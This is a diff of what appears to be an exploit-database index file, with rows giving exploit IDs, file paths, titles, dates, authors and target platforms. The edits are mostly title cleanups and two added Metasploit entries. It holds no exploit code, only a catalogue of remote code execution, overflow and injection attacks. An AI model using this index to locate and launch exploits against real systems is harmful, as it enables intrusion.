230,exploits/linux/remote/230.c,"LPRng 3.6.24-1 - Remote Command Execution",2000-12-15,VeNoMouS,remote,linux,515 230,exploits/linux/remote/230.c,"LPRng 3.6.24-1 - Remote Command Execution",2000-12-15,VeNoMouS,remote,linux,515
232,exploits/windows/remote/232.c,"Check Point VPN-1/FireWall-1 4.1 SP2 - Blocked Port Bypass",2000-12-19,anonymous,remote,windows, 232,exploits/windows/remote/232.c,"Check Point VPN-1/FireWall-1 4.1 SP2 - Blocked Port Bypass",2000-12-19,anonymous,remote,windows,
234,exploits/bsd/remote/234.c,"OpenBSD ftpd 2.6/2.7 - Remote Overflow",2000-12-20,Scrippie,remote,bsd,21 234,exploits/bsd/remote/234.c,"OpenBSD ftpd 2.6/2.7 - Remote Overflow",2000-12-20,Scrippie,remote,bsd,21
237,exploits/linux/remote/237.c,"Linux Kernel 2.2 - TCP/IP Weakness Spoof IP",2001-01-02,Stealth,remote,linux,513 237,exploits/linux/remote/237.c,"Linux Kernel 2.2 - TCP/IP Spoof IP",2001-01-02,Stealth,remote,linux,513
239,exploits/solaris/remote/239.c,"WU-FTPD 2.6.0 - Remote Format Strings",2001-01-03,kalou,remote,solaris,21 239,exploits/solaris/remote/239.c,"WU-FTPD 2.6.0 - Remote Format Strings",2001-01-03,kalou,remote,solaris,21
253,exploits/linux/remote/253.pl,"IMAP4rev1 10.190 - Authentication Stack Overflow",2001-01-19,teleh0r,remote,linux,143 253,exploits/linux/remote/253.pl,"IMAP4rev1 10.190 - Authentication Stack Overflow",2001-01-19,teleh0r,remote,linux,143
254,exploits/hardware/remote/254.c,"Cisco - Password Bruteforcer",2001-01-19,norby,remote,hardware,23 254,exploits/hardware/remote/254.c,"Cisco - Password Bruteforcer",2001-01-19,norby,remote,hardware,23
@ -11394,7 +11397,7 @@ id,file,description,date,author,type,platform,port
6387,exploits/windows/remote/6387.rb,"CitectSCADA ODBC Server - Remote Stack Buffer Overflow (Metasploit)",2008-09-05,"Kevin Finisterre",remote,windows,2022 6387,exploits/windows/remote/6387.rb,"CitectSCADA ODBC Server - Remote Stack Buffer Overflow (Metasploit)",2008-09-05,"Kevin Finisterre",remote,windows,2022
6407,exploits/windows/remote/6407.c,"Microworld Mailscan 5.6.a - Password Reveal",2008-09-09,SlaYeR,remote,windows, 6407,exploits/windows/remote/6407.c,"Microworld Mailscan 5.6.a - Password Reveal",2008-09-09,SlaYeR,remote,windows,
6414,exploits/windows/remote/6414.html,"Peachtree Accounting 2004 - 'PAWWeb11.ocx' ActiveX Insecure Method",2008-09-10,"Jeremy Brown",remote,windows, 6414,exploits/windows/remote/6414.html,"Peachtree Accounting 2004 - 'PAWWeb11.ocx' ActiveX Insecure Method",2008-09-10,"Jeremy Brown",remote,windows,
6454,exploits/windows/remote/6454.html,"Microsoft Windows Media Encoder (Windows XP SP2) - 'wmex.dll' ActiveX Buffer Overflow (MS08-053)",2008-09-13,haluznik,remote,windows, 6454,exploits/windows/remote/6454.html,"Microsoft Windows Media Encoder (XP SP2) - 'wmex.dll' ActiveX Buffer Overflow (MS08-053)",2008-09-13,haluznik,remote,windows,
6476,exploits/hardware/remote/6476.html,"Cisco Router - HTTP Administration Cross-Site Request Forgery / Command Execution (1)",2008-09-17,"Jeremy Brown",remote,hardware, 6476,exploits/hardware/remote/6476.html,"Cisco Router - HTTP Administration Cross-Site Request Forgery / Command Execution (1)",2008-09-17,"Jeremy Brown",remote,hardware,
6477,exploits/hardware/remote/6477.html,"Cisco Router - HTTP Administration Cross-Site Request Forgery / Command Execution (2)",2008-09-17,"Jeremy Brown",remote,hardware, 6477,exploits/hardware/remote/6477.html,"Cisco Router - HTTP Administration Cross-Site Request Forgery / Command Execution (2)",2008-09-17,"Jeremy Brown",remote,hardware,
6491,exploits/windows/remote/6491.html,"NuMedia Soft Nms DVD Burning SDK - ActiveX 'NMSDVDX.dll' Command Execution",2008-09-19,Nine:Situations:Group,remote,windows, 6491,exploits/windows/remote/6491.html,"NuMedia Soft Nms DVD Burning SDK - ActiveX 'NMSDVDX.dll' Command Execution",2008-09-19,Nine:Situations:Group,remote,windows,
@ -14395,8 +14398,8 @@ id,file,description,date,author,type,platform,port
23380,exploits/multiple/remote/23380.txt,"WebWasher Classic 2.2/3.3 - Error Message Cross-Site Scripting",2003-11-13,"Oliver Karow",remote,multiple, 23380,exploits/multiple/remote/23380.txt,"WebWasher Classic 2.2/3.3 - Error Message Cross-Site Scripting",2003-11-13,"Oliver Karow",remote,multiple,
23396,exploits/multiple/remote/23396.txt,"SIRCD Server 0.5.2/0.5.3 - Operator Privilege Escalation",2003-11-20,"Victor Jerlin",remote,multiple, 23396,exploits/multiple/remote/23396.txt,"SIRCD Server 0.5.2/0.5.3 - Operator Privilege Escalation",2003-11-20,"Victor Jerlin",remote,multiple,
23397,exploits/linux/remote/23397.pl,"Monit 1.4/2.x/3/4 - 'HTTP Request' Buffer Overrun",2003-11-24,Shadowinteger,remote,linux, 23397,exploits/linux/remote/23397.pl,"Monit 1.4/2.x/3/4 - 'HTTP Request' Buffer Overrun",2003-11-24,Shadowinteger,remote,linux,
23398,exploits/windows/remote/23398.pl,"Qualcomm Eudora 6.0.1/6.1.1 - Attachment LaunchProtect Warning Bypass Weakness (1)",2003-11-25,"Paul Szabo",remote,windows, 23398,exploits/windows/remote/23398.pl,"Qualcomm Eudora 6.0.1/6.1.1 - Attachment LaunchProtect Warning Bypass (1)",2003-11-25,"Paul Szabo",remote,windows,
23399,exploits/windows/remote/23399.pl,"Qualcomm Eudora 6.0.1/6.1.1 - Attachment LaunchProtect Warning Bypass Weakness (2)",2003-11-25,"Paul Szabo",remote,windows, 23399,exploits/windows/remote/23399.pl,"Qualcomm Eudora 6.0.1/6.1.1 - Attachment LaunchProtect Warning Bypass (2)",2003-11-25,"Paul Szabo",remote,windows,
23400,exploits/windows/remote/23400.txt,"Microsoft Outlook Express 6.0 - '.MHTML' Forced File Execution (1)",2003-11-25,"Liu Die",remote,windows, 23400,exploits/windows/remote/23400.txt,"Microsoft Outlook Express 6.0 - '.MHTML' Forced File Execution (1)",2003-11-25,"Liu Die",remote,windows,
23401,exploits/windows/remote/23401.txt,"Microsoft Outlook Express 6.0 - MHTML Forced File Execution (2)",2003-11-25,"Liu Die Yu",remote,windows, 23401,exploits/windows/remote/23401.txt,"Microsoft Outlook Express 6.0 - MHTML Forced File Execution (2)",2003-11-25,"Liu Die Yu",remote,windows,
23405,exploits/multiple/remote/23405.c,"Applied Watch Command Center 1.0 - Authentication Bypass (2)",2003-11-28,"Bugtraq Security",remote,multiple, 23405,exploits/multiple/remote/23405.c,"Applied Watch Command Center 1.0 - Authentication Bypass (2)",2003-11-28,"Bugtraq Security",remote,multiple,
@ -14404,8 +14407,8 @@ id,file,description,date,author,type,platform,port
23413,exploits/linux/remote/23413.c,"PLD Software Ebola 0.1.4 - Remote Buffer Overflow",2003-12-05,c0wboy,remote,linux, 23413,exploits/linux/remote/23413.c,"PLD Software Ebola 0.1.4 - Remote Buffer Overflow",2003-12-05,c0wboy,remote,linux,
23417,exploits/windows/remote/23417.pl,"EZMeeting 3.x - 'EZNet.exe' Long HTTP Request Remote Buffer Overflow",2003-12-08,kralor,remote,windows, 23417,exploits/windows/remote/23417.pl,"EZMeeting 3.x - 'EZNet.exe' Long HTTP Request Remote Buffer Overflow",2003-12-08,kralor,remote,windows,
23419,exploits/windows/remote/23419.txt,"Abyss Web Server 1.0/1.1 - Authentication Bypass",2003-12-08,"Luigi Auriemma",remote,windows, 23419,exploits/windows/remote/23419.txt,"Abyss Web Server 1.0/1.1 - Authentication Bypass",2003-12-08,"Luigi Auriemma",remote,windows,
23422,exploits/windows/remote/23422.txt,"Microsoft Internet Explorer 5/6 / Mozilla 1.2.1 - URI Display Obfuscation Weakness (1)",2003-12-09,"Guy Crumpley",remote,windows, 23422,exploits/windows/remote/23422.txt,"Microsoft Internet Explorer 5/6 / Mozilla 1.2.1 - URI Display Obfuscation (1)",2003-12-09,"Guy Crumpley",remote,windows,
23423,exploits/windows/remote/23423.txt,"Microsoft Internet Explorer 5/6 / Mozilla 1.2.1 - URI Display Obfuscation Weakness (2)",2003-12-09,"Zap The Dingbat",remote,windows, 23423,exploits/windows/remote/23423.txt,"Microsoft Internet Explorer 5/6 / Mozilla 1.2.1 - URI Display Obfuscation (2)",2003-12-09,"Zap The Dingbat",remote,windows,
23449,exploits/unix/remote/23449.txt,"Xerox MicroServer - Web Server Directory Traversal",2003-12-19,"J.A. Gutierrez",remote,unix, 23449,exploits/unix/remote/23449.txt,"Xerox MicroServer - Web Server Directory Traversal",2003-12-19,"J.A. Gutierrez",remote,unix,
23450,exploits/windows/remote/23450.txt,"PY Software Active Webcam 4.3 - WebServer Directory Traversal",2003-12-19,"Luigi Auriemma",remote,windows, 23450,exploits/windows/remote/23450.txt,"PY Software Active Webcam 4.3 - WebServer Directory Traversal",2003-12-19,"Luigi Auriemma",remote,windows,
23451,exploits/windows/remote/23451.txt,"PY Software Active Webcam 4.3 - WebServer Cross-Site Scripting",2003-12-19,"Luigi Auriemma",remote,windows, 23451,exploits/windows/remote/23451.txt,"PY Software Active Webcam 4.3 - WebServer Cross-Site Scripting",2003-12-19,"Luigi Auriemma",remote,windows,
@ -15417,8 +15420,8 @@ id,file,description,date,author,type,platform,port
30565,exploits/windows/remote/30565.pl,"AkkyWareHOUSE '7-zip32.dll' 4.42 - Heap Buffer Overflow",2007-09-04,miyy3t,remote,windows, 30565,exploits/windows/remote/30565.pl,"AkkyWareHOUSE '7-zip32.dll' 4.42 - Heap Buffer Overflow",2007-09-04,miyy3t,remote,windows,
30567,exploits/windows/remote/30567.html,"Microsoft Agent - 'agentdpv.dll' ActiveX Control Malformed URL Stack Buffer Overflow",2007-09-11,"Yamata Li",remote,windows, 30567,exploits/windows/remote/30567.html,"Microsoft Agent - 'agentdpv.dll' ActiveX Control Malformed URL Stack Buffer Overflow",2007-09-11,"Yamata Li",remote,windows,
30569,exploits/windows/remote/30569.py,"Unreal Commander 0.92 - Directory Traversal",2007-09-06,"Gynvael Coldwind",remote,windows, 30569,exploits/windows/remote/30569.py,"Unreal Commander 0.92 - Directory Traversal",2007-09-06,"Gynvael Coldwind",remote,windows,
32417,exploits/php/remote/32417.php,"PHP 5.2.6 - 'create_function()' Code Injection Weakness (2)",2008-09-25,80sec,remote,php, 32417,exploits/php/remote/32417.php,"PHP 5.2.6 - 'create_function()' Code Injection (2)",2008-09-25,80sec,remote,php,
32416,exploits/php/remote/32416.php,"PHP 5.2.6 - 'create_function()' Code Injection Weakness (1)",2008-09-25,80sec,remote,php, 32416,exploits/php/remote/32416.php,"PHP 5.2.6 - 'create_function()' Code Injection (1)",2008-09-25,80sec,remote,php,
32512,exploits/unix/remote/32512.rb,"FreePBX - 'config.php' Remote Code Execution (Metasploit)",2014-03-25,Metasploit,remote,unix, 32512,exploits/unix/remote/32512.rb,"FreePBX - 'config.php' Remote Code Execution (Metasploit)",2014-03-25,Metasploit,remote,unix,
32399,exploits/unix/remote/32399.txt,"Multiple Vendor FTP Server - Long Command Handling Security",2008-09-20,"Maksymilian Arciemowicz",remote,unix, 32399,exploits/unix/remote/32399.txt,"Multiple Vendor FTP Server - Long Command Handling Security",2008-09-20,"Maksymilian Arciemowicz",remote,unix,
32393,exploits/solaris/remote/32393.txt,"Sun Solaris 9/10 Text Editors - Command Execution",2008-09-17,"Eli the Bearded",remote,solaris, 32393,exploits/solaris/remote/32393.txt,"Sun Solaris 9/10 Text Editors - Command Execution",2008-09-17,"Eli the Bearded",remote,solaris,
@ -15693,8 +15696,8 @@ id,file,description,date,author,type,platform,port
32618,exploits/php/remote/32618.txt,"plexusCMS 0.5 - Cross-Site Scripting / Remote Shell / Credentials Leak",2014-03-31,neglomaniac,remote,php, 32618,exploits/php/remote/32618.txt,"plexusCMS 0.5 - Cross-Site Scripting / Remote Shell / Credentials Leak",2014-03-31,neglomaniac,remote,php,
32643,exploits/windows/remote/32643.txt,"PhonerLite 2.14 SIP Soft Phone - SIP Digest Disclosure",2014-04-01,"Jason Ostrom",remote,windows,5060 32643,exploits/windows/remote/32643.txt,"PhonerLite 2.14 SIP Soft Phone - SIP Digest Disclosure",2014-04-01,"Jason Ostrom",remote,windows,5060
32654,exploits/windows/remote/32654.txt,"Microsoft Internet Explorer 8 - CSS 'expression' Property Cross-Site Scripting Filter Bypass",2008-12-11,"Rafel Ivgi",remote,windows, 32654,exploits/windows/remote/32654.txt,"Microsoft Internet Explorer 8 - CSS 'expression' Property Cross-Site Scripting Filter Bypass",2008-12-11,"Rafel Ivgi",remote,windows,
32673,exploits/multiple/remote/32673.java,"GNU Classpath 0.97.2 - 'gnu.java.security.util.PRNG' Class Entropy Weakness (1)",2008-12-05,"Jack Lloyd",remote,multiple, 32673,exploits/multiple/remote/32673.java,"GNU Classpath 0.97.2 - 'gnu.java.security.util.PRNG' Class Entropy (1)",2008-12-05,"Jack Lloyd",remote,multiple,
32674,exploits/multiple/remote/32674.cpp,"GNU Classpath 0.97.2 - 'gnu.java.security.util.PRNG' Class Entropy Weakness (2)",2008-12-05,"Jack Lloyd",remote,multiple, 32674,exploits/multiple/remote/32674.cpp,"GNU Classpath 0.97.2 - 'gnu.java.security.util.PRNG' Class Entropy (2)",2008-12-05,"Jack Lloyd",remote,multiple,
32681,exploits/hardware/remote/32681.txt,"COMTREND CT-536 / HG-536 Routers - Multiple Remote Vulnerabilities",2008-12-22,"Daniel Fernandez Bleda",remote,hardware, 32681,exploits/hardware/remote/32681.txt,"COMTREND CT-536 / HG-536 Routers - Multiple Remote Vulnerabilities",2008-12-22,"Daniel Fernandez Bleda",remote,hardware,
32684,exploits/windows/remote/32684.c,"Microsoft Windows Media Player 9/10/11 - '.WAV' File Parsing Code Execution",2008-12-29,anonymous,remote,windows, 32684,exploits/windows/remote/32684.c,"Microsoft Windows Media Player 9/10/11 - '.WAV' File Parsing Code Execution",2008-12-29,anonymous,remote,windows,
32686,exploits/multiple/remote/32686.xml,"MagpieRSS 0.72 - CDATA HTML Injection",2008-12-29,system_meltdown,remote,multiple, 32686,exploits/multiple/remote/32686.xml,"MagpieRSS 0.72 - CDATA HTML Injection",2008-12-29,system_meltdown,remote,multiple,
@ -16099,8 +16102,8 @@ id,file,description,date,author,type,platform,port
35001,exploits/windows/remote/35001.txt,"SAP NetWeaver 7.0 - SQL Monitor Multiple Cross-Site Scripting Vulnerabilities",2010-11-17,a.polyakov,remote,windows, 35001,exploits/windows/remote/35001.txt,"SAP NetWeaver 7.0 - SQL Monitor Multiple Cross-Site Scripting Vulnerabilities",2010-11-17,a.polyakov,remote,windows,
35002,exploits/windows/remote/35002.html,"VideoLAN VLC Media Player 1.1.x - Calling Convention Remote Buffer Overflow",2010-11-02,shinnai,remote,windows, 35002,exploits/windows/remote/35002.html,"VideoLAN VLC Media Player 1.1.x - Calling Convention Remote Buffer Overflow",2010-11-02,shinnai,remote,windows,
35003,exploits/multiple/remote/35003.txt,"IBM OmniFind - 'command' Cross-Site Scripting",2010-11-09,"Fatih Kilic",remote,multiple, 35003,exploits/multiple/remote/35003.txt,"IBM OmniFind - 'command' Cross-Site Scripting",2010-11-09,"Fatih Kilic",remote,multiple,
35005,exploits/windows/remote/35005.html,"WebKit - Insufficient Entropy Random Number Generator Weakness (1)",2010-11-18,"Amit Klein",remote,windows, 35005,exploits/windows/remote/35005.html,"WebKit - Insufficient Entropy Random Number Generator (1)",2010-11-18,"Amit Klein",remote,windows,
35006,exploits/windows/remote/35006.html,"WebKit - Insufficient Entropy Random Number Generator Weakness (2)",2010-11-18,"Amit Klein",remote,windows, 35006,exploits/windows/remote/35006.html,"WebKit - Insufficient Entropy Random Number Generator (2)",2010-11-18,"Amit Klein",remote,windows,
35007,exploits/windows/remote/35007.c,"Native Instruments (Multiple Products) - DLL Loading Arbitrary Code Execution",2010-11-19,"Gjoko Krstic",remote,windows, 35007,exploits/windows/remote/35007.c,"Native Instruments (Multiple Products) - DLL Loading Arbitrary Code Execution",2010-11-19,"Gjoko Krstic",remote,windows,
35011,exploits/linux/remote/35011.txt,"Apache Tomcat 7.0.4 - 'sort' / 'orderBy' Cross-Site Scripting",2010-11-22,"Adam Muntner",remote,linux, 35011,exploits/linux/remote/35011.txt,"Apache Tomcat 7.0.4 - 'sort' / 'orderBy' Cross-Site Scripting",2010-11-22,"Adam Muntner",remote,linux,
35014,exploits/hardware/remote/35014.txt,"D-Link DIR-300 - WiFi Key Security Bypass",2010-11-24,"Gaurav Saha",remote,hardware, 35014,exploits/hardware/remote/35014.txt,"D-Link DIR-300 - WiFi Key Security Bypass",2010-11-24,"Gaurav Saha",remote,hardware,
@ -16281,7 +16284,7 @@ id,file,description,date,author,type,platform,port
36169,exploits/multiple/remote/36169.rb,"HP Client - Automation Command Injection (Metasploit)",2015-02-24,Metasploit,remote,multiple,3465 36169,exploits/multiple/remote/36169.rb,"HP Client - Automation Command Injection (Metasploit)",2015-02-24,Metasploit,remote,multiple,3465
36174,exploits/windows/remote/36174.txt,"ServersCheck Monitoring Software 8.8.x - Multiple Vulnerabilities",2011-09-27,Vulnerability-Lab,remote,windows, 36174,exploits/windows/remote/36174.txt,"ServersCheck Monitoring Software 8.8.x - Multiple Vulnerabilities",2011-09-27,Vulnerability-Lab,remote,windows,
36199,exploits/linux/remote/36199.txt,"Perl 5.x - Digest Module 'Digest->new()' Code Injection",2011-10-02,anonymous,remote,linux, 36199,exploits/linux/remote/36199.txt,"Perl 5.x - Digest Module 'Digest->new()' Code Injection",2011-10-02,anonymous,remote,linux,
36205,exploits/hardware/remote/36205.txt,"SonicWALL - SessId Cookie Brute Force Weakness Admin Session Hijacking",2011-10-04,"Hugo Vazquez",remote,hardware, 36205,exploits/hardware/remote/36205.txt,"SonicWALL - 'SessId' Cookie Brute Force / Admin Session Hijacking",2011-10-04,"Hugo Vazquez",remote,hardware,
36206,exploits/windows/remote/36206.rb,"Persistent Systems Client Automation - Command Injection Remote Code Execution (Metasploit)",2015-02-27,"Ben Turner",remote,windows,3465 36206,exploits/windows/remote/36206.rb,"Persistent Systems Client Automation - Command Injection Remote Code Execution (Metasploit)",2015-02-27,"Ben Turner",remote,windows,3465
36209,exploits/windows/remote/36209.html,"Microsoft Internet Explorer 8 - Select Element Memory Corruption",2011-10-11,"Ivan Fratric",remote,windows, 36209,exploits/windows/remote/36209.html,"Microsoft Internet Explorer 8 - Select Element Memory Corruption",2011-10-11,"Ivan Fratric",remote,windows,
36263,exploits/linux/remote/36263.rb,"Symantec Web Gateway 5 - 'restore.php' (Authenticated) Command Injection (Metasploit)",2015-03-04,Metasploit,remote,linux,443 36263,exploits/linux/remote/36263.rb,"Symantec Web Gateway 5 - 'restore.php' (Authenticated) Command Injection (Metasploit)",2015-03-04,Metasploit,remote,linux,443
@ -16957,13 +16960,13 @@ id,file,description,date,author,type,platform,port
41996,exploits/php/remote/41996.sh,"Vanilla Forums < 2.3 - Remote Code Execution",2017-05-11,"Dawid Golunski",remote,php, 41996,exploits/php/remote/41996.sh,"Vanilla Forums < 2.3 - Remote Code Execution",2017-05-11,"Dawid Golunski",remote,php,
42010,exploits/linux/remote/42010.rb,"Quest Privilege Manager - pmmasterd Buffer Overflow (Metasploit)",2017-05-15,Metasploit,remote,linux, 42010,exploits/linux/remote/42010.rb,"Quest Privilege Manager - pmmasterd Buffer Overflow (Metasploit)",2017-05-15,Metasploit,remote,linux,
42011,exploits/windows/remote/42011.py,"LabF nfsAxe 3.7 FTP Client - Remote Buffer Overflow (SEH)",2017-05-15,Tulpa,remote,windows, 42011,exploits/windows/remote/42011.py,"LabF nfsAxe 3.7 FTP Client - Remote Buffer Overflow (SEH)",2017-05-15,Tulpa,remote,windows,
42030,exploits/windows_x86-64/remote/42030.py,"Microsoft Windows Windows 8/8.1/2012 R2 (x64) - 'EternalBlue' SMB Remote Code Execution (MS17-010)",2017-05-17,sleepya,remote,windows_x86-64,445 42030,exploits/windows_x86-64/remote/42030.py,"Microsoft Windows 8/8.1/2012 R2 (x64) - 'EternalBlue' SMB Remote Code Execution (MS17-010)",2017-05-17,sleepya,remote,windows_x86-64,445
42022,exploits/windows/remote/42022.rb,"Dup Scout Enterprise 9.5.14 - GET Buffer Overflow (Metasploit)",2017-05-17,Metasploit,remote,windows, 42022,exploits/windows/remote/42022.rb,"Dup Scout Enterprise 9.5.14 - GET Buffer Overflow (Metasploit)",2017-05-17,Metasploit,remote,windows,
42023,exploits/windows/remote/42023.rb,"Serviio Media Server - checkStreamUrl Command Execution (Metasploit)",2017-05-17,Metasploit,remote,windows,23423 42023,exploits/windows/remote/42023.rb,"Serviio Media Server - checkStreamUrl Command Execution (Metasploit)",2017-05-17,Metasploit,remote,windows,23423
42024,exploits/php/remote/42024.rb,"WordPress PHPMailer 4.6 - Host Header Command Injection (Metasploit)",2017-05-17,Metasploit,remote,php, 42024,exploits/php/remote/42024.rb,"WordPress PHPMailer 4.6 - Host Header Command Injection (Metasploit)",2017-05-17,Metasploit,remote,php,
42025,exploits/php/remote/42025.rb,"BuilderEngine 3.5.0 - Arbitrary File Upload and Execution (Metasploit)",2017-05-17,Metasploit,remote,php,80 42025,exploits/php/remote/42025.rb,"BuilderEngine 3.5.0 - Arbitrary File Upload and Execution (Metasploit)",2017-05-17,Metasploit,remote,php,80
42026,exploits/xml/remote/42026.py,"Oracle PeopleSoft - XML External Entity to SYSTEM Remote Code Execution",2017-05-17,"Ambionics Security",remote,xml, 42026,exploits/xml/remote/42026.py,"Oracle PeopleSoft - XML External Entity to SYSTEM Remote Code Execution",2017-05-17,"Ambionics Security",remote,xml,
42031,exploits/windows/remote/42031.py,"Microsoft Windows Windows 7/2008 R2 - 'EternalBlue' SMB Remote Code Execution (MS17-010)",2017-05-17,sleepya,remote,windows,445 42031,exploits/windows/remote/42031.py,"Microsoft Windows 7/2008 R2 - 'EternalBlue' SMB Remote Code Execution (MS17-010)",2017-05-17,sleepya,remote,windows,445
42083,exploits/windows/remote/42083.rb,"Octopus Deploy - (Authenticated) Code Execution (Metasploit)",2017-05-29,Metasploit,remote,windows, 42083,exploits/windows/remote/42083.rb,"Octopus Deploy - (Authenticated) Code Execution (Metasploit)",2017-05-29,Metasploit,remote,windows,
42084,exploits/linux/remote/42084.rb,"Samba 3.5.0 < 4.4.14/4.5.10/4.6.4 - 'is_known_pipename()' Arbitrary Module Load (Metasploit)",2017-05-29,Metasploit,remote,linux, 42084,exploits/linux/remote/42084.rb,"Samba 3.5.0 < 4.4.14/4.5.10/4.6.4 - 'is_known_pipename()' Arbitrary Module Load (Metasploit)",2017-05-29,Metasploit,remote,linux,
42041,exploits/windows/remote/42041.txt,"Secure Auditor 3.0 - Directory Traversal",2017-05-20,hyp3rlinx,remote,windows, 42041,exploits/windows/remote/42041.txt,"Secure Auditor 3.0 - Directory Traversal",2017-05-20,hyp3rlinx,remote,windows,
@ -16993,7 +16996,7 @@ id,file,description,date,author,type,platform,port
42297,exploits/php/remote/42297.py,"Lepide Auditor Suite - 'createdb()' Web Console Database Injection / Remote Code Execution",2017-07-05,mr_me,remote,php,7778 42297,exploits/php/remote/42297.py,"Lepide Auditor Suite - 'createdb()' Web Console Database Injection / Remote Code Execution",2017-07-05,mr_me,remote,php,7778
42303,exploits/multiple/remote/42303.txt,"Yaws 1.91 - Remote File Disclosure",2017-07-07,hyp3rlinx,remote,multiple, 42303,exploits/multiple/remote/42303.txt,"Yaws 1.91 - Remote File Disclosure",2017-07-07,hyp3rlinx,remote,multiple,
42304,exploits/windows/remote/42304.py,"Easy File Sharing Web Server 7.2 - GET 'PassWD' Remote Buffer Overflow (DEP Bypass)",2017-07-08,"Sungchul Park",remote,windows, 42304,exploits/windows/remote/42304.py,"Easy File Sharing Web Server 7.2 - GET 'PassWD' Remote Buffer Overflow (DEP Bypass)",2017-07-08,"Sungchul Park",remote,windows,
42315,exploits/windows/remote/42315.py,"Microsoft Windows Windows 7/8.1/2008 R2/2012 R2/2016 R2 - 'EternalBlue' SMB Remote Code Execution (MS17-010)",2017-07-11,sleepya,remote,windows, 42315,exploits/windows/remote/42315.py,"Microsoft Windows 7/8.1/2008 R2/2012 R2/2016 R2 - 'EternalBlue' SMB Remote Code Execution (MS17-010)",2017-07-11,sleepya,remote,windows,
42327,exploits/windows/remote/42327.html,"Firefox 50.0.1 - ASM.JS JIT-Spray Remote Code Execution",2017-07-14,Rh0,remote,windows, 42327,exploits/windows/remote/42327.html,"Firefox 50.0.1 - ASM.JS JIT-Spray Remote Code Execution",2017-07-14,Rh0,remote,windows,
42328,exploits/windows/remote/42328.py,"FTPGetter 5.89.0.85 - Remote Buffer Overflow (SEH)",2017-07-14,"Paul Purcell",remote,windows, 42328,exploits/windows/remote/42328.py,"FTPGetter 5.89.0.85 - Remote Buffer Overflow (SEH)",2017-07-14,"Paul Purcell",remote,windows,
42331,exploits/hardware/remote/42331.txt,"Belkin F7D7601 NetCam - Multiple Vulnerabilities",2017-07-17,Wadeek,remote,hardware, 42331,exploits/hardware/remote/42331.txt,"Belkin F7D7601 NetCam - Multiple Vulnerabilities",2017-07-17,Wadeek,remote,hardware,
@ -17271,13 +17274,15 @@ id,file,description,date,author,type,platform,port
46513,exploits/multiple/remote/46513.java,"Oracle Weblogic Server - Deserialization Remote Command Execution (Patch Bypass)",2018-10-25,allyshka,remote,multiple, 46513,exploits/multiple/remote/46513.java,"Oracle Weblogic Server - Deserialization Remote Command Execution (Patch Bypass)",2018-10-25,allyshka,remote,multiple,
46514,exploits/multiple/remote/46514.js,"TeamCity < 9.0.2 - Disabled Registration Bypass",2018-03-28,allyshka,remote,multiple, 46514,exploits/multiple/remote/46514.js,"TeamCity < 9.0.2 - Disabled Registration Bypass",2018-03-28,allyshka,remote,multiple,
46516,exploits/multiple/remote/46516.py,"OpenSSH SCP Client - Write Arbitrary Files",2019-01-11,"Harry Sintonen",remote,multiple, 46516,exploits/multiple/remote/46516.py,"OpenSSH SCP Client - Write Arbitrary Files",2019-01-11,"Harry Sintonen",remote,multiple,
46539,exploits/php/remote/46539.rb,"elFinder PHP Connector < 2.1.48 - exiftran Command Injection (Metasploit)",2019-03-13,Metasploit,remote,php, 46539,exploits/php/remote/46539.rb,"elFinder PHP Connector < 2.1.48 - 'exiftran' Command Injection (Metasploit)",2019-03-13,Metasploit,remote,php,
46540,exploits/windows/remote/46540.py,"Apache Tika-server < 1.18 - Command Injection",2019-03-13,"Rhino Security Labs",remote,windows, 46540,exploits/windows/remote/46540.py,"Apache Tika-server < 1.18 - Command Injection",2019-03-13,"Rhino Security Labs",remote,windows,
46543,exploits/windows/remote/46543.py,"FTPGetter Standard 5.97.0.177 - Remote Code Execution",2019-03-14,w4fz5uck5,remote,windows, 46543,exploits/windows/remote/46543.py,"FTPGetter Standard 5.97.0.177 - Remote Code Execution",2019-03-14,w4fz5uck5,remote,windows,
46544,exploits/multiple/remote/46544.py,"Apache UNO / LibreOffice Version: 6.1.2 / OpenOffice 4.1.6 API - Remote Code Execution",2019-03-14,sud0woodo,remote,multiple, 46544,exploits/multiple/remote/46544.py,"Apache UNO / LibreOffice Version: 6.1.2 / OpenOffice 4.1.6 API - Remote Code Execution",2019-03-14,sud0woodo,remote,multiple,
46547,exploits/windows/remote/46547.py,"Mail Carrier 2.5.1 - 'MAIL FROM' Buffer Overflow",2019-03-15,"Joseph McDonagh",remote,windows,25 46547,exploits/windows/remote/46547.py,"Mail Carrier 2.5.1 - 'MAIL FROM' Buffer Overflow",2019-03-15,"Joseph McDonagh",remote,windows,25
46556,exploits/multiple/remote/46556.rb,"BMC Patrol Agent - Privilege Escalation Code Execution Execution (Metasploit)",2019-03-18,Metasploit,remote,multiple,3181 46556,exploits/multiple/remote/46556.rb,"BMC Patrol Agent - Privilege Escalation Code Execution Execution (Metasploit)",2019-03-18,Metasploit,remote,multiple,3181
46572,exploits/java/remote/46572.rb,"Jenkins 2.137 and Pipeline Groovy Plugin 2.61 - ACL Bypass and Metaprogramming RCE (Metasploit)",2019-03-19,Metasploit,remote,java, 46572,exploits/java/remote/46572.rb,"Jenkins 2.137 and Pipeline Groovy Plugin 2.61 - ACL Bypass and Metaprogramming Remote Code Execution (Metasploit)",2019-03-19,Metasploit,remote,java,
46627,exploits/php/remote/46627.rb,"CMS Made Simple (CMSMS) Showtime2 - File Upload RCE (Metasploit)",2019-03-28,Metasploit,remote,php,80
46628,exploits/multiple/remote/46628.rb,"Oracle Weblogic Server Deserialization RCE - Raw Object (Metasploit)",2019-03-28,Metasploit,remote,multiple,
6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php, 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php, 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php, 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@ -27564,8 +27569,8 @@ id,file,description,date,author,type,platform,port
22297,exploits/php/webapps/22297.pl,"Typo3 3.5 b5 - 'showpic.php' File Enumeration",2003-02-28,"Martin Eiszner",webapps,php, 22297,exploits/php/webapps/22297.pl,"Typo3 3.5 b5 - 'showpic.php' File Enumeration",2003-02-28,"Martin Eiszner",webapps,php,
